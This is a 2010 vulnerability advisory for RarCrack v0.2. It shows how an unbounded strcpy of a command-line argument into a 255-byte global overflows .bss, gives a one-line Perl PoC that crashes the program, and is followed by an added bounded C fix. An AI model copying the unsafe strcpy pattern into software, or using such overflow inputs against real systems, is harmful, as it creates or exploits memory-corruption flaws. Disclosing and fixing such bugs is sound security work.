The software can be downloaded here: http://rarcrack.sourceforge.net/
# Author: stoke
# Date: 2010-09-20
# Download: http://rarcrack.sourceforge.net/
# Tested on: Backtrack 4
#############################
Site: http://devilcode.it | http://hack2web.altervista.org
Special greetz to: nex, for reassuring me when I said "WHY EIP IT'S NOT CHANGED!!!!!!!?!!!"

[ASCII art crew banner]

Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind
############################
RarCrack v0.2 bss overflow PoC
###########################################
Function affected: init();
Type: local;
Variable overflowed: filename;
###########################################
########################################################
Here we have:
----- Start useful code snip --------
char filename[255];
----- End useful code snip ----------
This variable is declared above the "main" function, so it is global and allocated in .bss.
In the init() function we have:
---- Start useful code snip ----
    if (strcmp(argv[i],"--help") == 0) {
        printf("Usage: rarcrack encrypted_archive.ext [--threads NUM] [--type rar|zip|7z]\n\n");
        printf("Options: --help: show this screen.\n");
        printf("         --type: you can specify the archive program, this needed when\n");
        printf("                 the program couldn't detect the proper file type\n");
        printf("         --threads: you can specify how many threads\n");
        printf("                    will be run, maximum 12 (default: 2)\n\n");
        printf("Info: This program supports only RAR, ZIP and 7Z encrypted archives.\n");
        printf("      RarCrack! usually detects the archive type.\n\n");
        help = 1;
        break;
    } else if (strcmp(argv[i],"--threads") == 0) {
        if ((i + 1) < argc) {
            sscanf(argv[++i], "%d", &threads);
            if (threads < 1) threads = 1;
            if (threads > 12) {
                printf("INFO: number of threads adjusted to 12\n");
                threads = 12;
            }
        } else {
            printf("ERROR: missing parameter for option: --threads!\n");
            help = 1;
        }
    } else if (strcmp(argv[i],"--type") == 0) {
        if ((i + 1) < argc) {
            sscanf(argv[++i], "%s", &test);
            for (j = 0; strcmp(TYPE[j], "") != 0; j++) {
                if (strcmp(TYPE[j], test) == 0) {
                    strcpy(finalcmd, CMD[j]);
                    archive_type = j;
                    break;
                }
            }
            if (archive_type < 0) {
                printf("WARNING: invalid parameter --type %s!\n", argv[i]);
                finalcmd[0] = '\0';
            }
        } else {
            printf("ERROR: missing parameter for option: --type!\n");
            help = 1;
        }
    } else {
        /* any other argument is copied, unbounded, into the 255-byte global */
        strcpy((char*)&filename, argv[i]);
---- Stop useful code snip ----
As you can see, at the end of this code there is a strcpy into our "filename" variable, so if you pass more than 255 bytes in a single argv entry you get a Segmentation Fault.
###########################################################################
###########################################################################
PoC
./rarcrack `perl -e 'print "A" x500'`
###########################################################################
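For comparison, a bounded version of that last branch, written here as an added example and not taken from rarcrack or from the advisory's author: the global keeps the advisory's size (255 bytes, .bss), the copy is replaced by a length check plus memcpy, and an over-long argument is reported instead of written past the end of the buffer. The names set_filename, get_filename, parse_args and try_argument_of_length are chosen for this example; parse_args is a simplified stand-in for the quoted init() loop (only --threads is handled, with the original's 1..12 clamp and default of 2) and is not rarcrack's code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same shape as the original: a fixed-size global, so it lives in .bss.
 * The size is the one the advisory quotes (char filename[255]). */
static char filename[255];

/* Bounded replacement for strcpy((char*)&filename, argv[i]).
 * Refuses any argument that does not fit together with its terminating NUL,
 * so an over-long argv entry is reported instead of overwriting whatever
 * follows filename in .bss. Returns 0 on success, -1 on rejection. */
int set_filename(const char *arg)
{
    size_t len = strlen(arg);
    if (len >= sizeof filename) {
        fprintf(stderr, "ERROR: filename too long (%zu bytes, max %zu)\n",
                len, sizeof filename - 1);
        return -1;
    }
    memcpy(filename, arg, len + 1);   /* copies the NUL as well */
    return 0;
}

const char *get_filename(void)
{
    return filename;
}

/* Simplified argument loop mirroring the quoted init() fragment (hypothetical,
 * not rarcrack's code): --threads is parsed and clamped to 1..12 as in the
 * original, anything else is taken as the archive name.
 * Returns 0 when every argument was accepted, -1 otherwise. */
int parse_args(int argc, char **argv, int *threads)
{
    int i;
    *threads = 2;                      /* rarcrack's documented default */
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "--threads") == 0) {
            if (i + 1 >= argc) {
                fprintf(stderr, "ERROR: missing parameter for option: --threads!\n");
                return -1;
            }
            *threads = atoi(argv[++i]);
            if (*threads < 1) *threads = 1;
            if (*threads > 12) *threads = 12;
        } else if (set_filename(argv[i]) != 0) {
            return -1;
        }
    }
    return 0;
}

/* Test helper: feeds an n-byte run of 'A' (constructed here, standing in for
 * the advisory's perl -e 'print "A" x500') through set_filename and returns
 * its result. */
int try_argument_of_length(size_t n)
{
    char *buf = malloc(n + 1);
    int rc;
    if (buf == NULL) return -1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    rc = set_filename(buf);
    free(buf);
    return rc;
}

int main(int argc, char **argv)
{
    int threads;
    if (parse_args(argc, argv, &threads) != 0) return 1;
    printf("archive: %s, threads: %d\n", get_filename(), threads);
    return 0;
}
```

The check is `len >= sizeof filename` rather than `>`, because the terminating NUL also needs a slot: a 255-byte argument fits the bytes but not the terminator, and is rejected for the same reason a 500-byte one is. Running the program with the advisory's 500 x "A" argument now prints the error and exits 1 instead of faulting.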